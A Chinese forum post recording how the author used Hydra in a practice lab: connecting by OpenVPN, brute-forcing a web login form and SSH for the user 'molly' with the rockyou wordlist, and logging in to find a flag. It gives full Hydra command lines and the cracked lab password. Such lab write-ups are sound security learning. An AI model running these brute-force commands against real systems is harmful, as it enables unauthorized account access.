首页
社区
课程
招聘
[原创]记录下hydra的用法,靶场简单测试
发表于: 6天前 463

[原创]记录下hydra的用法,靶场简单测试

6天前
463

hydra是kali自带的一个密码爆破软件,支持多种协议。包括ssl,http-post等等。

先连靶场,在靶场的网页上下载openvpn的配置文件。

ovpn后缀的文件放到虚拟机kali里。然后,

$ sudo openvpn /home/kali/Downloads/ap-south-1-yoyozisama-regular.ovpn

然后会显示这个,算是连上了,保持这个窗口不关闭,打开另一个终端操作。

浏览器输入靶机ip,长这样

可以看到ip后面有个/login,所以可以这样构造hydra命令

$ hydra -l molly -P rockyou.txt 10.49.143.80 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

molly是username, rockyou.txt是密码字典,默认在/usr/share/wordlists文件夹

结果:

然后是破解ssh密码:

命令如下

$ hydra -l molly -P rockyou.txt 10.49.143.80 ssh

结果:

密码是butterfly

然后连上ssh:

$ ssh molly@10.49.143.80

输入密码,登录。

看到flag2.txt。结束


传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!!

收藏
免费 0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回